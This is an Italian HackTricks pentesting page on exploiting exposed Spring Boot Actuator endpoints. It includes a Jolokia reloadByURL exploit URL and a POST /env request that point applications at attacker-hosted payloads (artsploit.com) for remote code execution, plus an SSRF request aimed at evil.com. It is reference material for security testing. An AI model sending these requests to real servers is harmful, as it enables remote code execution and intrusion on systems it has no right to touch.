Spring Actuators

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
Ottieni il merchandising ufficiale di PEASS & HackTricks
Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository di Github.

Bypass di Autenticazione Spring

Da https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Sfruttare gli Attuatori di Spring Boot

Controlla il post originale da [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Punti Chiave:

Gli Attuatori di Spring Boot registrano endpoint come /health, /trace, /beans, /env, ecc. Nelle versioni da 1 a 1.4, questi endpoint sono accessibili senza autenticazione. Dalla versione 1.5 in poi, solo /health e /info non sono sensibili per impostazione predefinita, ma spesso gli sviluppatori disabilitano questa sicurezza.
Alcuni endpoint degli Attuatori possono esporre dati sensibili o consentire azioni dannose:
/dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, e /heapdump.
In Spring Boot 1.x, gli attuatori sono registrati sotto l'URL radice, mentre in 2.x sono sotto il percorso di base /actuator/.

Tecniche di Sfruttamento:

Esecuzione di Codice Remoto tramite '/jolokia':

L'endpoint dell'attuatore /jolokia espone la libreria Jolokia, che consente l'accesso HTTP a MBeans.
L'azione reloadByURL può essere sfruttata per ricaricare le configurazioni di logging da un URL esterno, il che può portare a XXE cieco o Esecuzione di Codice Remoto tramite configurazioni XML artigianali.
URL di exploit di esempio: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

Modifica della Configurazione tramite '/env':

Se sono presenti le librerie Spring Cloud, l'endpoint /env consente la modifica delle proprietà ambientali.
Le proprietà possono essere manipolate per sfruttare vulnerabilità, come la vulnerabilità di deserializzazione XStream nel serviceURL di Eureka.
Esempio di richiesta POST di exploit:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

Altre Impostazioni Utili:

Proprietà come spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, e spring.datasource.tomcat.max-active possono essere manipolate per vari sfruttamenti, come l'SQL injection o l'alterazione delle stringhe di connessione al database.

Informazioni Aggiuntive:

Un elenco completo degli attuatori predefiniti può essere trovato qui.
L'endpoint /env in Spring Boot 2.x utilizza il formato JSON per la modifica delle proprietà, ma il concetto generale rimane lo stesso.

Argomenti Correlati:

RCE di Env + H2:

Dettagli sull'esplorazione della combinazione dell'endpoint /env e del database H2 possono essere trovati qui.

SSRF su Spring Boot Attraverso un'Interpretazione Errata del Nome del Percorso:

La gestione dei parametri di matrice (;) del framework Spring nei nomi dei percorsi HTTP può essere sfruttata per Server-Side Request Forgery (SSRF).
Esempio di richiesta di exploit:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PreviousSource code Review / SAST Tools NextSymfony

Last updated 2 days ago